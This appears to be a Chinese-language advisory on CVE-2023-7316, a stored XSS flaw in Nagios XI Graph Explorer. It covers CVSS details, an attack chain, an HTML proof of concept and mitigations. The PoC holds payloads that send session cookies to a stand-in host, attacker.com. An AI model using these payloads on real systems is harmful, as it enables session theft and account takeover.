CVE-2023-7316 Nagios XI Graph Explorer跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2023-7316

漏洞类型

XSS（跨站脚本）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI

漏洞概述

CVE-2023-7316是Nagios XI软件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于Nagios XI的Graph Explorer组件中，攻击者可以通过该组件注入恶意JavaScript代码。当其他用户访问包含恶意脚本的页面时，这些脚本将在受害者浏览器上下文中执行，从而窃取会话令牌、劫持用户账户或执行其他恶意操作。Nagios XI是一款广泛使用的企业级网络和系统监控工具，因此该漏洞可能影响大量使用该软件进行IT基础设施监控的组织。由于漏洞需要低权限用户身份且需要用户交互才能触发，CVSS评分被评定为5.4分（中危）。攻击者首先需要获得Nagios XI的低权限账户，然后通过Graph Explorer功能注入恶意脚本。漏洞影响2024R1之前的所有Nagios XI版本，官方已在2024R1版本中修复了此问题。建议所有使用Nagios XI的组织尽快升级到最新版本或应用官方提供的安全补丁。

技术细节

该漏洞是典型的存储型跨站脚本漏洞，攻击向量为网络（AV:N），攻击复杂度低（AC:L），需要低权限（PR:L）用户身份，并且需要用户交互（UI:R）才能触发。漏洞的根本原因在于Nagios XI的Graph Explorer组件对用户输入的验证和转义不充分。Graph Explorer是Nagios XI用于可视化监控数据的组件，它允许用户创建和查看各种图表。在处理用户提供的输入数据时，该组件未能正确对特殊字符进行HTML转义，导致攻击者可以注入恶意的JavaScript代码。攻击者只需在Graph Explorer的相关输入字段中插入包含<script>标签或事件处理器（如onerror、onload等）的恶意代码，这些代码就会被存储在服务器端。当其他用户访问包含该恶意数据的页面时，浏览器会解析并执行这些脚本。攻击者可以利用此漏洞窃取受害者的会话cookie、进行钓鱼攻击、修改页面内容或执行其他基于浏览器的攻击。由于攻击需要用户交互，受害者需要访问特定的页面或触发特定的操作才能激活恶意脚本，这增加了攻击的复杂性但也降低了被发现的可能性。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标组织使用的Nagios XI版本，确认版本低于2024R1以确定是否存在CVE-2023-7316漏洞

STEP 2

初始访问

攻击者获取Nagios XI的低权限用户账户，可以通过社会工程学、凭据填充或利用其他低危漏洞获得

STEP 3

漏洞利用准备

攻击者登录Nagios XI系统，导航至Graph Explorer组件，准备注入恶意XSS payload

STEP 4

恶意脚本注入

攻击者在Graph Explorer的输入字段中注入包含恶意JavaScript代码的payload，该代码被存储在服务器数据库中

STEP 5

诱导受害者

攻击者通过钓鱼邮件、内部消息或其他社交工程手段诱导具有高权限的受害者访问包含恶意脚本的Graph Explorer页面

STEP 6

脚本执行

当受害者访问被植入恶意代码的页面时，浏览器解析并执行攻击者注入的JavaScript代码，在受害者浏览器上下文中运行

STEP 7

会话劫持

恶意脚本窃取受害者的会话cookie或执行其他恶意操作，攻击者利用窃取的凭据提升权限或执行进一步的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2023-7316 Nagios XI Graph Explorer XSS PoC -->
<!-- This PoC demonstrates the XSS vulnerability in Nagios XI Graph Explorer component -->
<!-- Target: Nagios XI versions prior to 2024R1 -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2023-7316 PoC</title>
</head>
<body>
    <h1>Nagios XI Graph Explorer XSS PoC</h1>
    
    <script>
        // Payload for stored XSS via Graph Explorer
        // This script demonstrates how an attacker could exploit the vulnerability
        
        const xssPayload = '<script>alert("XSS - CVE-2023-7316");document.location="https://attacker.com/steal?cookie="+document.cookie</script>';
        
        // Alternative payload using img onerror
        const imgPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?c=\'+document.cookie)">';
        
        // To exploit:
        // 1. Login to Nagios XI with low-privilege account
        // 2. Navigate to Graph Explorer component
        // 3. Inject XSS payload in graph name or related field
        // 4. When other users view the graph, the script executes
        
        console.log('CVE-2023-7316 PoC - XSS via Graph Explorer');
        console.log('Payload: ' + xssPayload);
        
        // Simulate the attack flow
        function simulateAttack() {
            // Step 1: Attacker with low privilege account logs in
            console.log('[Step 1] Attacker authenticates with low-privilege account');
            
            // Step 2: Navigate to Graph Explorer
            console.log('[Step 2] Navigate to Graph Explorer component');
            
            // Step 3: Inject malicious XSS payload
            console.log('[Step 3] Inject XSS payload: ' + xssPayload);
            
            // Step 4: Payload is stored on server
            console.log('[Step 4] Malicious script stored on server');
            
            // Step 5: Victim visits the page
            console.log('[Step 5] Victim views the page containing malicious script');
            
            // Step 6: Script executes in victim\'s browser
            console.log('[Step 6] XSS payload executes in victim\'s browser context');
            alert('XSS Executed - Cookie: ' + document.cookie);
        }
        
        // Uncomment to execute simulation
        // simulateAttack();
    </script>
    
    <h2>Attack Requirements:</h2>
    <ul>
        <li>Valid low-privilege Nagios XI account</li>
        <li>Access to Graph Explorer component</li>
        <li>Target Nagios XI version < 2024R1</li>
    </ul>
    
    <h2>CVSS 3.1 Vector:</h2>
    <p>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N</p>
</body>
</html>

影响范围

Nagios XI < 2024R1

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1）限制对Graph Explorer组件的访问权限，仅允许受信任的管理员用户访问；2）实施严格的输入过滤规则，对Graph Explorer相关的所有输入字段进行HTML标签过滤；3）启用HTTPOnly和Secure标志保护会话cookie，降低会话劫持风险；4）部署Web应用防火墙规则检测XSS特征；5）监控用户活动日志，及时发现异常行为；6）考虑使用虚拟补丁技术在上游阻断对此漏洞的利用。建议在业务窗口期尽快完成版本升级以彻底消除该安全风险。